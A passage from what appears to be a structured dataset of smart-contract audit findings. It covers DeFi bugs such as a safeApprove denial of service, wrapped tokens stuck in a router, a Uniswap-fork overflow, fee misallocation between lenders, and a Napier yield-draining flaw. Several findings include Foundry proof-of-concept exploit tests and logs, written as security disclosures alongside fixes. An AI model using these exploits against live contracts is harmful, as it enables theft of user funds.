Alternatively, always limit side token to sell amount to max of side token balance when hedging (but needs additional research if that might create issues).чAlmost all IG Bear trades will revert in certain situations, leading to core protocol function being unavailable and potentially loss of funds to the users who expected to do these trades.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from \"forge-std/Test.sol\";\\nimport {console} from \"forge-std/console.sol\";\\nimport {UD60x18, ud, convert} from \"@prb/math/UD60x18.sol\";\\n\\nimport {IERC20} from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport {IPositionManager} from \"@project/interfaces/IPositionManager.sol\";\\nimport {Epoch} from \"@project/lib/EpochController.sol\";\\nimport {AmountsMath} from \"@project/lib/AmountsMath.sol\";\\nimport {EpochFrequency} from \"@project/lib/EpochFrequency.sol\";\\nimport {OptionStrategy} from \"@project/lib/OptionStrategy.sol\";\\nimport {AddressProvider} from \"@project/AddressProvider.sol\";\\nimport {MarketOracle} from \"@project/MarketOracle.sol\";\\nimport {FeeManager} from \"@project/FeeManager.sol\";\\nimport {Vault} from \"@project/Vault.sol\";\\nimport {TestnetToken} from \"@project/testnet/TestnetToken.sol\";\\nimport {TestnetPriceOracle} from \"@project/testnet/TestnetPriceOracle.sol\";\\nimport {DVPUtils} from \"./utils/DVPUtils.sol\";\\nimport {TokenUtils} from \"./utils/TokenUtils.sol\";\\nimport {Utils} from \"./utils/Utils.sol\";\\nimport {VaultUtils} from \"./utils/VaultUtils.sol\";\\nimport {MockedIG} from \"./mock/MockedIG.sol\";\\nimport {MockedRegistry} from \"./mock/MockedRegistry.sol\";\\nimport {MockedVault} from \"./mock/MockedVault.sol\";\\nimport {TestnetSwapAdapter} from \"@project/testnet/TestnetSwapAdapter.sol\";\\nimport {PositionManager} from \"@project/periphery/PositionManager.sol\";\\n\\n\\ncontract IGTradeTest is Test {\\n using 
AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.WEEKLY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n // try to buy/sell ig bull below strike for user's profit\\n // this will not be hedged, and thus the vault should lose funds\\n function test() public {\\n _strike = 1e18;\\n 
VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipWeek(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n DVPUtils.debugState(ig);\\n\\n testBuyOption(1.24e18, 1, 0); // re-balance to have 0 side tokens\\n testBuyOption(1.24e18, 0, 0.1e18); // reverts due to computation error and incorrect check to fix it\\n }\\n\\n function testBuyOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n (uint256 premium, uint256 fee) = _assurePremium(charlie, _strike, optionAmountUp, optionAmountDown);\\n\\n vm.startPrank(charlie);\\n premium = ig.mint(charlie, _strike, optionAmountUp, optionAmountDown, premium, 10e18, 0);\\n vm.stopPrank();\\n\\n console.log(\"premium\", premium);\\n }\\n\\n function testSellOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal returns (uint) {\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n uint256 charliePayoff;\\n uint256 charliePayoffFee;\\n {\\n vm.startPrank(charlie);\\n (charliePayoff, charliePayoffFee) = ig.payoff(\\n ig.currentEpoch(),\\n _strike,\\n optionAmountUp,\\n optionAmountDown\\n );\\n\\n charliePayoff = ig.burn(\\n ig.currentEpoch(),\\n charlie,\\n _strike,\\n optionAmountUp,\\n optionAmountDown,\\n charliePayoff,\\n 0.1e18\\n );\\n vm.stopPrank();\\n\\n console.log(\"payoff received\", charliePayoff);\\n }\\n }\\n\\n function _assurePremium(\\n address user,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown\\n ) private returns (uint256 premium_, uint256 fee) {\\n (premium_, fee) = ig.premium(strike, amountUp, amountDown);\\n TokenUtils.provideApprovedTokens(admin, address(baseToken), user, address(ig), premium_*5, vm);\\n }\\n}\\n```\\n\\nNotice: execution will revert when trying to buy IG Bear options.ч```\\n 
if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n -Mint and sales can be dossed due to lack of safeApprove to 0чmediumчThe lack of approval to 0 to the dvp contract, and the fee managers during DVP mints and sales will cause that subsequent transactions involving approval of these contracts to spend the basetoken will fail, breaking their functionality.\\nWhen DVPs are to be minted and sold through the PositionManager, the `mint` and `sell` functions are invoked. The first issue appears here, where the DVP contract is approved to spend the basetoken using the OpenZeppelin's `safeApprove` function, without first approving to zero. Further down the line, the `mint` and `sell` functions make calls to the DVP contract to `mint` and burn DVP respectively.\\nThe _mint and _burn functions in the DVP contract approves the fee manager to spend the fee - vaultFee/netFee.\\nThis issue here is that OpenZeppelin's `safeApprove()` function does not allow changing a non-zero allowance to another non-zero allowance. This will therefore cause all subsequent approval of the basetoken to fail after the first approval, dossing the contract's minting and selling/burning functionality.\\nOpenZeppelin's `safeApprove()` will revert if the account already is approved and the new `safeApprove()` is done with a non-zero value.\\n```\\n function safeApprove(\\n IERC20 token,\\n address spender,\\n uint256 value\\n ) internal {\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. 
To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n require(\\n (value == 0) || (token.allowance(address(this), spender) == 0),\\n \"SafeERC20: approve from non-zero to non-zero allowance\"\\n );\\n _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));\\n }\\n```\\nчApprove first to 0;\\nUpdate the OpenZeppelin version to the latest and use the `forceApprove` functions instead;\\nRefactor the functions to allow for direct transfer of base tokens to the DVP and FeeManager contracts directly.чThis causes that after the first approval for the baseToken has been given, subsequent approvals will fail causing the functions to fail.ч```\\n function safeApprove(\\n IERC20 token,\\n address spender,\\n uint256 value\\n ) internal {\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n require(\\n (value == 0) || (token.allowance(address(this), spender) == 0),\\n \"SafeERC20: approve from non-zero to non-zero allowance\"\\n );\\n _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));\\n }\\n```\\n -User wrapped tokens get stuck in master router because of incorrect calculationчmediumчSwapping exact tokens for ETH swaps underlying token amount, not wrapped token amount and this causes wrapped tokens to get stuck in the contract.\\nIn the protocol the `JalaMasterRouter` is used to swap tokens with less than 18 decimals. It is achieved by wrapping the underlying tokens and interacting with the `JalaRouter02`. Wrapping the token gives it decimals 18 (18 - token.decimals()). 
There are also functions that swap with native ETH.\\nIn the `swapExactTokensForETH` function the tokens are transferred from the user to the Jala master router, wrapped, approved to `JalaRouter2` and then `IJalaRouter02::swapExactTokensForETH()` is called with the amount of tokens to swap, to address, deadline and path.\\nThe amount of tokens to swap that is passed, is the amount before the wrap. Hence the wrappedAmount - underlyingAmount is stuck.\\nAdd the following test to `JalaMasterRouter.t.sol` and run with `forge test --mt testswapExactTokensForETHStuckTokens -vvv`\\n```\\n function testswapExactTokensForETHStuckTokens() public {\\n address wrappedTokenA = IChilizWrapperFactory(wrapperFactory).wrappedTokenFor(address(tokenA));\\n\\n tokenA.approve(address(wrapperFactory), type(uint256).max);\\n wrapperFactory.wrap(address(this), address(tokenA), 100);\\n\\n IERC20(wrappedTokenA).approve(address(router), 100 ether);\\n router.addLiquidityETH{value: 100 ether}(wrappedTokenA, 100 ether, 0, 0, address(this), type(uint40).max);\\n\\n address pairAddress = factory.getPair(address(WETH), wrapperFactory.wrappedTokenFor(address(tokenA)));\\n\\n uint256 pairBalance = JalaPair(pairAddress).balanceOf(address(this));\\n\\n address[] memory path = new address[](2);\\n path[0] = wrappedTokenA;\\n path[1] = address(WETH);\\n\\n vm.startPrank(user0);\\n console.log(\"ETH user balance before: \", user0.balance);\\n console.log(\"TokenA user balance before: \", tokenA.balanceOf(user0));\\n console.log(\"WTokenA router balance before: \", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n\\n tokenA.approve(address(masterRouter), 550);\\n masterRouter.swapExactTokensForETH(address(tokenA), 550, 0, path, user0, type(uint40).max);\\n vm.stopPrank();\\n\\n console.log(\"ETH user balance after: \", user0.balance);\\n console.log(\"TokenA user balance after: \", tokenA.balanceOf(user0));\\n console.log(\"WTokenA router balance after: \", 
IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n }\\n```\\nчIn `JalaMasterRouter::swapExactTokensForETH()` multiply the `amountIn` by decimal off set of the token:\\n```\\n function swapExactTokensForETH(\\n address originTokenAddress,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address[] calldata path,\\n address to,\\n uint256 deadline\\n ) external virtual override returns (uint256[] memory amounts) {\\n address wrappedTokenIn = IChilizWrapperFactory(wrapperFactory).wrappedTokenFor(originTokenAddress);\\n\\n require(path[0] == wrappedTokenIn, \"MS: !path\");\\n\\n TransferHelper.safeTransferFrom(originTokenAddress, msg.sender, address(this), amountIn);\\n _approveAndWrap(originTokenAddress, amountIn);\\n IERC20(wrappedTokenIn).approve(router, IERC20(wrappedTokenIn).balanceOf(address(this)));\\n\\n// Add the line below\\n uint256 decimalOffset = IChilizWrappedERC20(wrappedTokenIn).getDecimalsOffset();\\n// Add the line below\\n amounts = IJalaRouter02(router).swapExactTokensForETH(amountIn * decimalOffset, amountOutMin, path, to, deadline);\\n// Remove the line below\\n amounts = IJalaRouter02(router).swapExactTokensForETH(amountIn , amountOutMin, path, to, deadline);\\n }\\n```\\nчUser wrapped tokens get stuck in router contract. 
The can be stolen by someone performing a `swapExactTokensForTokens()` because it uses the whole balance of the contract when swapping: `IERC20(wrappedTokenIn).balanceOf(address(this))`\\n```\\n amounts = IJalaRouter02(router).swapExactTokensForTokens(\\n IERC20(wrappedTokenIn).balanceOf(address(this)),\\n amountOutMin,\\n path,\\n address(this),\\n deadline\\n );\\n```\\nч```\\n function testswapExactTokensForETHStuckTokens() public {\\n address wrappedTokenA = IChilizWrapperFactory(wrapperFactory).wrappedTokenFor(address(tokenA));\\n\\n tokenA.approve(address(wrapperFactory), type(uint256).max);\\n wrapperFactory.wrap(address(this), address(tokenA), 100);\\n\\n IERC20(wrappedTokenA).approve(address(router), 100 ether);\\n router.addLiquidityETH{value: 100 ether}(wrappedTokenA, 100 ether, 0, 0, address(this), type(uint40).max);\\n\\n address pairAddress = factory.getPair(address(WETH), wrapperFactory.wrappedTokenFor(address(tokenA)));\\n\\n uint256 pairBalance = JalaPair(pairAddress).balanceOf(address(this));\\n\\n address[] memory path = new address[](2);\\n path[0] = wrappedTokenA;\\n path[1] = address(WETH);\\n\\n vm.startPrank(user0);\\n console.log(\"ETH user balance before: \", user0.balance);\\n console.log(\"TokenA user balance before: \", tokenA.balanceOf(user0));\\n console.log(\"WTokenA router balance before: \", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n\\n tokenA.approve(address(masterRouter), 550);\\n masterRouter.swapExactTokensForETH(address(tokenA), 550, 0, path, user0, type(uint40).max);\\n vm.stopPrank();\\n\\n console.log(\"ETH user balance after: \", user0.balance);\\n console.log(\"TokenA user balance after: \", tokenA.balanceOf(user0));\\n console.log(\"WTokenA router balance after: \", IERC20(wrappedTokenA).balanceOf(address(masterRouter)));\\n }\\n```\\n -JalaPair potential permanent DoS due to overflowчmediumчIn the `JalaPair::_update` function, overflow is intentionally desired in the calculations for `timeElapsed` and 
`priceCumulative`. This is forked from the UniswapV2 source code, and it's meant and known to overflow. UniswapV2 was developed using Solidity 0.6.6, where arithmetic operations overflow and underflow by default. However, Jala utilizes Solidity >=0.8.0, where such operations will automatically revert.\\n```\\nuint32 timeElapsed = blockTimestamp - blockTimestampLast; // overflow is desired\\nif (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n // * never overflows, and + overflow is desired\\n price0CumulativeLast += uint256(UQ112x112.encode(_reserve1).uqdiv(_reserve0)) * timeElapsed;\\n price1CumulativeLast += uint256(UQ112x112.encode(_reserve0).uqdiv(_reserve1)) * timeElapsed;\\n}\\n```\\nчUse the `unchecked` block to ensure everything overflows as expectedчThis issue could potentially lead to permanent denial of service for a pool. All the core functionalities such as `mint`, `burn`, or `swap` would be broken. Consequently, all funds would be locked within the contract.\\nI think issue with High impact and a Low probability (merely due to the extended timeframe for the event's occurrence, it's important to note that this event will occur with 100% probability if the protocol exists at that time), should be considered at least as Medium.\\nReferences\\nThere are cases where the same issue is considered High.ч```\\nuint32 timeElapsed = blockTimestamp - blockTimestampLast; // overflow is desired\\nif (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {\\n // * never overflows, and + overflow is desired\\n price0CumulativeLast += uint256(UQ112x112.encode(_reserve1).uqdiv(_reserve0)) * timeElapsed;\\n price1CumulativeLast += uint256(UQ112x112.encode(_reserve0).uqdiv(_reserve1)) * timeElapsed;\\n}\\n```\\n -Fees aren't distributed properly for positions with multiple lenders, causing loss of funds for lendersчhighчFees distributed are calculated according to a lender's amount lent divided by the total amount lent, which causes more recent lenders to steal 
fees from older lenders.\\n```\\n uint256 feesAmt = FullMath.mulDiv(feesOwed, cache.holdTokenDebt, borrowedAmount); //fees owed multiplied by the individual amount lent, divided by the total amount lent\\n // rest of code\\n loansFeesInfo[creditor][cache.holdToken] += feesAmt;\\n harvestedAmt += feesAmt;\\n```\\n\\nThe above is from harvest(); `repay()` calculates the fees similarly. Because `borrow()` doesn't distribute fees, the following scenario will occur when a borrower increases an existing position:\\nBorrower has an existing position with fees not yet collected by the lenders.\\nBorrower increases the position with a loan from a new lender.\\n`harvest()` or `repay()` is called, and the new lender is credited with some of the previous fees earned by the other lenders due to the fees calculation. Other lenders lose fees.\\nThis scenario can naturally occur during the normal functioning of the protocol, or a borrower/attacker with a position with a large amount of uncollected fees can maliciously open a proportionally large loan with an attacker to steal most of the fees.\\nAlso note that ANY UPDATE ISSUE? LOW PRIOчA potential fix is to harvest fees in the borrow() function; the scenario above will no longer be possible.чLoss of funds for lenders, potential for borrowers to steal fees.ч```\\n uint256 feesAmt = FullMath.mulDiv(feesOwed, cache.holdTokenDebt, borrowedAmount); //fees owed multiplied by the individual amount lent, divided by the total amount lent\\n // rest of code\\n loansFeesInfo[creditor][cache.holdToken] += feesAmt;\\n harvestedAmt += feesAmt;\\n```\\n -Entrance fees are distributed wrongly in loans with multiple lendersчmediumчEntrance fees are distributed improperly, some lenders are likely to lose some portion of their entrance fees. 
Also, calling `updateHoldTokenEntranceFee()` can cause improper entrance fee distribution in loans with multiple lenders.\\nNote that entrance fees are added to the borrower's `feesOwed` when borrowing:\\n```\\n borrowing.feesOwed += entranceFee;\\n```\\n\\n```\\n uint256 feesAmt = FullMath.mulDiv(feesOwed, cache.holdTokenDebt, borrowedAmount); //fees owed multiplied by the individual amount lent, divided by the total amount lent\\n // rest of code\\n loansFeesInfo[creditor][cache.holdToken] += feesAmt;\\n harvestedAmt += feesAmt;\\n```\\n\\nThis is a problem because the entrance fees will be distributed among all lenders instead of credited to each lender. Example:\\nA borrower takes a loan of 100 tokens from a lender and pays an entrance fee of 10 tokens.\\nAfter some time, the lender harvests fees and fees are set to zero. (This step could be frontrunning the below step.)\\nThe borrower immediately takes out another loan of 100 tokens and pays an entrance fee of 10 tokens.\\nWhen fees are harvested again, due to the calculation in the code block above, 5 tokens of the entrance fee go to the first lender and 5 tokens go to the second lender. The first lender has collected 15 tokens of entrance fees, while the second lender has collected only 5 — despite both loans having the same borrowed amount.\\nFurthermore, if the entrance fee is increased then new lenders will lose part of their entrance fee. Example:\\nA borrower takes a loan of 100 tokens from a lender and pays an entrance fee of 10 tokens.\\nThe entrance fee is increased.\\nThe borrower increases the position by taking a loan of 100 tokens from a new lender, and pays an entrance fee of 20 tokens.\\n`harvest()` is called, and both lenders receive 15 tokens out of the total 30 tokens paid as entrance fees. 
This is wrong since the first lender should receive 10 and the second lender should receive 20.чCould add the entrance fee directly to the lender's fees balance instead of adding it to feesOwed, and then track the entrance fee in the loan data to be used in min fee enforcement calculations.чLenders are likely to lose entrance fees.ч```\\n borrowing.feesOwed += entranceFee;\\n```\\n -A borrower eligible for liquidation can pay an improperly large amount of fees, and may be unfairly liquidatedчmediumчIf a borrower is partially liquidated and then increases the collateral balance to avoid further liquidation, they will pay an improperly large amount of fees and can be unfairly liquidated.\\n```\\n (collateralBalance, currentFees) = _calculateCollateralBalance(\\n borrowing.borrowedAmount,\\n borrowing.accLoanRatePerSeconds,\\n borrowing.dailyRateCollateralBalance,\\n accLoanRatePerSeconds\\n );\\n // rest of code\\n if (collateralBalance > 0) {\\n // rest of code\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance; //entire collateral amount\\n }\\n // rest of code\\n borrowing.feesOwed += _pickUpPlatformFees(borrowing.holdToken, currentFees);\\n```\\n\\nWhen liquidation occurs right after becoming liquidatable, the `collateralBalance` calculation in `repay()` above will be a small value like -1; and essentially all the fees owed will be collected.\\nIf the borrower notices the partial liquidation and wishes to avoid further liquidation, `increaseCollateralBalance()` can be called to become solvent again. But since the `accLoanRatePerSeconds` wasn't updated, the borrower will have to doubly pay all the fees that were just collected. This will happen if a lender calls `harvest()` or the loan is liquidated again. 
The loan can also be liquidated unfairly, because the `collateralBalance` calculated above will be much lower than it should be.чUpdate `accLoanRatePerSeconds` for incomplete emergency liquidations.чThe borrower may pay too many fees, and it's also possible to unfairly liquidate the position.ч```\\n (collateralBalance, currentFees) = _calculateCollateralBalance(\\n borrowing.borrowedAmount,\\n borrowing.accLoanRatePerSeconds,\\n borrowing.dailyRateCollateralBalance,\\n accLoanRatePerSeconds\\n );\\n // rest of code\\n if (collateralBalance > 0) {\\n // rest of code\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance; //entire collateral amount\\n }\\n // rest of code\\n borrowing.feesOwed += _pickUpPlatformFees(borrowing.holdToken, currentFees);\\n```\\n -All yield could be drained if users set any ````> 0```` allowance to othersчhighч`Tranche.redeemWithYT()` is not well implemented, all yield could be drained if users set any `> 0` allowance to others.\\nThe issue arises on L283, all `accruedInTarget` is sent out, this will not work while users have allowances to others. 
Let's say, alice has `1000 YT` (yield token) which has generated `100 TT` (target token), and if she approves bob `100 YT` allowance, then bob should only be allowed to take the proportional target token, which is `100 TT` * (100 YT / 1000 YT) = 10 TT.\\n```\\nFile: src\\Tranche.sol\\n function redeemWithYT(address from, address to, uint256 pyAmount) external nonReentrant returns (uint256) {\\n// rest of code\\n accruedInTarget += _computeAccruedInterestInTarget(\\n _gscales.maxscale,\\n _lscale,\\n// rest of code\\n _yt.balanceOf(from)\\n );\\n..\\n uint256 sharesRedeemed = pyAmount.divWadDown(_gscales.maxscale);\\n// rest of code\\n _target.safeTransfer(address(adapter), sharesRedeemed + accruedInTarget);\\n (uint256 amountWithdrawn, ) = adapter.prefundedRedeem(to);\\n// rest of code\\n return amountWithdrawn;\\n }\\n```\\n\\nThe following coded PoC shows all unclaimed and unaccrued target token could be drained out, even if the allowance is as low as `1wei`.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {TestTranche} from \"./Tranche.t.sol\";\\nimport \"forge-std/console2.sol\";\\n\\ncontract TrancheAllowanceIssue is TestTranche {\\n address bob = address(0x22);\\n function setUp() public virtual override {\\n super.setUp();\\n }\\n\\n function testTrancheAllowanceIssue() public {\\n // 1. issue some PT and YT\\n deal(address(underlying), address(this), 1_000e6, true);\\n tranche.issue(address(this), 1_000e6);\\n\\n // 2. generating some unclaimed yield\\n vm.warp(block.timestamp + 30 days);\\n _simulateScaleIncrease();\\n\\n // 3. give bob any negligible allowance, could be as low as only 1wei\\n tranche.approve(bob, 1);\\n yt.approve(bob, 1);\\n\\n // 4. 
all unclaimed and pending yield drained by bob\\n assertEq(0, underlying.balanceOf(bob));\\n vm.prank(bob);\\n tranche.redeemWithYT(address(this), bob, 1);\\n assertTrue(underlying.balanceOf(bob) > 494e6);\\n }\\n}\\n```\\n\\nAnd the logs:\\n```\\n2024-01-napier\\napier-v1> forge test --match-test testTrancheAllowanceIssue -vv\\n[⠔] Compiling// rest of code\\n[⠊] Compiling 42 files with 0.8.19\\n[⠔] Solc 0.8.19 finished in 82.11sCompiler run successful!\\n[⠒] Solc 0.8.19 finished in 82.11s\\n\\nRunning 1 test for test/unit/TrancheAllowanceIssue.t.sol:TrancheAllowanceIssue\\n[PASS] testTrancheAllowanceIssue() (gas: 497585)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.06ms\\n\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\nч```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/napier// Remove the line below\\nv1/src/Tranche.sol b/napier// Remove the line below\\nv1/src/Tranche.sol\\nindex 62d9562..65db5c6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/napier// Remove the line below\\nv1/src/Tranche.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/napier// Remove the line below\\nv1/src/Tranche.sol\\n@@ // Remove the line below\\n275,12 // Add the line below\\n275,15 @@ contract Tranche is BaseToken, ReentrancyGuard, Pausable, ITranche {\\n delete unclaimedYields[from];\\n gscales = _gscales;\\n\\n// Add the line below\\n uint256 accruedProportional = accruedInTarget * pyAmount / _yt.balanceOf(from);\\n// Add the line below\\n unclaimedYields[from] = accruedInTarget // Remove the line below\\n accruedProportional;\\n// Add the line below\\n \\n // Burn PT and YT tokens from `from`\\n _burnFrom(from, pyAmount);\\n _yt.burnFrom(from, msg.sender, pyAmount);\\n\\n // Withdraw underlying tokens from the adapter and transfer them to the user\\n// Remove the line below\\n _target.safeTransfer(address(adapter), sharesRedeemed // 
Add the line below\\n accruedInTarget);\\n// Add the line below\\n _target.safeTransfer(address(adapter), sharesRedeemed // Add the line below\\n accruedProportional);\\n (uint256 amountWithdrawn, ) = adapter.prefundedRedeem(to);\\n\\n emit RedeemWithYT(from, to, amountWithdrawn);\\n```\\nчUsers lost all unclaimed and unaccrued yieldч```\\nFile: src\\Tranche.sol\\n function redeemWithYT(address from, address to, uint256 pyAmount) external nonReentrant returns (uint256) {\\n// rest of code\\n accruedInTarget += _computeAccruedInterestInTarget(\\n _gscales.maxscale,\\n _lscale,\\n// rest of code\\n _yt.balanceOf(from)\\n );\\n..\\n uint256 sharesRedeemed = pyAmount.divWadDown(_gscales.maxscale);\\n// rest of code\\n _target.safeTransfer(address(adapter), sharesRedeemed + accruedInTarget);\\n (uint256 amountWithdrawn, ) = adapter.prefundedRedeem(to);\\n// rest of code\\n return amountWithdrawn;\\n }\\n```\\n -LP Tokens always valued at 3 PTsчhighчLP Tokens are always valued at 3 PTs. As a result, users of the AMM pool might receive fewer assets/PTs than expected. The AMM pool might be unfairly arbitraged, resulting in a loss for the pool's LPs.\\nThe Napier AMM pool facilitates trade between underlying assets and PTs. The PTs in the pool are represented by the Curve's Base LP Token of the Curve's pool that holds the PTs. The Napier AMM pool and Router math assumes that the Base LP Token is equivalent to 3 times the amount of PTs, as shown below. 
When the pool is initially deployed, it is correct that the LP token is equivalent to 3 times the amount of PT.\\n```\\nFile: PoolMath.sol\\n int256 internal constant N_COINS = 3;\\n..SNIP..\\n function swapExactBaseLpTokenForUnderlying(PoolState memory pool, uint256 exactBaseLptIn)\\n internal\\n..SNIP..\\n // Note: Here we are multiplying by N_COINS because the swap formula is defined in terms of the amount of PT being swapped.\\n // BaseLpt is equivalent to 3 times the amount of PT due to the initial deposit of 1:1:1:1=pt1:pt2:pt3:Lp share in Curve pool.\\n exactBaseLptIn.neg() * N_COINS\\n..SNIP..\\n function swapUnderlyingForExactBaseLpToken(PoolState memory pool, uint256 exactBaseLptOut)\\n..SNIP..\\n (int256 _netUnderlyingToAccount18, int256 _netUnderlyingFee18, int256 _netUnderlyingToProtocol18) = executeSwap(\\n pool,\\n // Note: sign is defined from the perspective of the swapper.\\n // positive because the swapper is buying pt\\n exactBaseLptOut.toInt256() * N_COINS\\n```\\n\\n```\\nFile: NapierPool.sol\\n /// @dev Number of coins in the BasePool\\n uint256 internal constant N_COINS = 3;\\n..SNIP..\\n totalBaseLptTimesN: baseLptUsed * N_COINS,\\n..SNIP..\\n totalBaseLptTimesN: totalBaseLpt * N_COINS,\\n```\\n\\nIn Curve, LP tokens are generally priced by computing the underlying tokens per share, hence dividing the total underlying token amounts by the total supply of the LP token. Given that the underlying assets in Curve's stable swap are pegged to each other, the invariant's $D$ value can be computed to estimate the total value of the underlying tokens.\\nCurve itself provides a function `get_virtual_price` that computes the price of the LP token by dividing $D$ with the total supply.\\nNote that for LP tokens, the ratio of the total underlying value and the total supply will grow (fee mechanism) over time. Thus, the virtual price's value will increase over time.\\nThis means the LP token will be worth more than 3 PTs in the Curve Pool over time. 
However, the Napier AMM pool still values its LP token at a constant value of 3 PTs. This discrepancy between the value of the LP tokens in the Napier AMM pool and Curve pool might result in various issues, such as the following:\\nInvestors bought LP tokens at the price of 3.X PT from the market. The LP tokens are deposited into or swapped into the Napier AMM pool. The Napier Pool will always assume that the price of the LP token is 3 PTs, thus shortchanging the number of assets or PTs returned to users.\\nPotential arbitrage opportunity where malicious users obtain the LP token from the Napier AMM pool at a value of 3 PT and redeem the LP token at a value higher than 3 PTs, pocketing the differences.чNapier and Pendle share the same core math for their AMM pool.\\nIn Pendle, the AMM stores the PTs and SY (Standard Yield Token). When performing any operation (e.g., deposit, swap), the SY will be converted to the underlying assets based on SY's current rate before performing any math operation. If it is a SY (wstETH), the SY's rate will be the current exchange rate for wstETH to stETH/ETH. One could also think the AMM's reserve is PTs and Underlying Assets under the hood.\\nIn Napier, the AMM stores the PTs and Curve's LP tokens. When performing any operation, the math will always convert the LP token to underlying assets using a static exchange rate of 3. However, this is incorrect, as the value of an LP token will grow over time. The AMM should value the LP tokens based on their current value. The virtual price of the LP token and other information can be leveraged to derive the current value of the LP tokens to facilitate the math operation within the pool.чUsers of the AMM pool might receive fewer assets/PTs than expected. 
The AMM pool might be unfairly arbitraged, resulting in a loss for the pool's LPs.ч```\\nFile: PoolMath.sol\\n int256 internal constant N_COINS = 3;\\n..SNIP..\\n function swapExactBaseLpTokenForUnderlying(PoolState memory pool, uint256 exactBaseLptIn)\\n internal\\n..SNIP..\\n // Note: Here we are multiplying by N_COINS because the swap formula is defined in terms of the amount of PT being swapped.\\n // BaseLpt is equivalent to 3 times the amount of PT due to the initial deposit of 1:1:1:1=pt1:pt2:pt3:Lp share in Curve pool.\\n exactBaseLptIn.neg() * N_COINS\\n..SNIP..\\n function swapUnderlyingForExactBaseLpToken(PoolState memory pool, uint256 exactBaseLptOut)\\n..SNIP..\\n (int256 _netUnderlyingToAccount18, int256 _netUnderlyingFee18, int256 _netUnderlyingToProtocol18) = executeSwap(\\n pool,\\n // Note: sign is defined from the perspective of the swapper.\\n // positive because the swapper is buying pt\\n exactBaseLptOut.toInt256() * N_COINS\\n```\\n -Victim's fund can be stolen due to rounding error and exchange rate manipulationчhighчVictim's funds can be stolen by malicious users by exploiting the rounding error and through exchange rate manipulation.\\nThe LST Adaptor attempts to guard against the well-known vault inflation attack by reverting the TX when the amount of shares minted is rounded down to zero in Line 78 below.\\n```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n uint256 bufferEthCache = bufferEth; // cache storage reads\\n uint256 queueEthCache = withdrawalQueueEth; // cache storage reads\\n uint256 assets = IWETH9(WETH).balanceOf(address(this)) - bufferEthCache; // amount of WETH deposited at this time\\n uint256 shares = previewDeposit(assets);\\n\\n if (assets == 0) 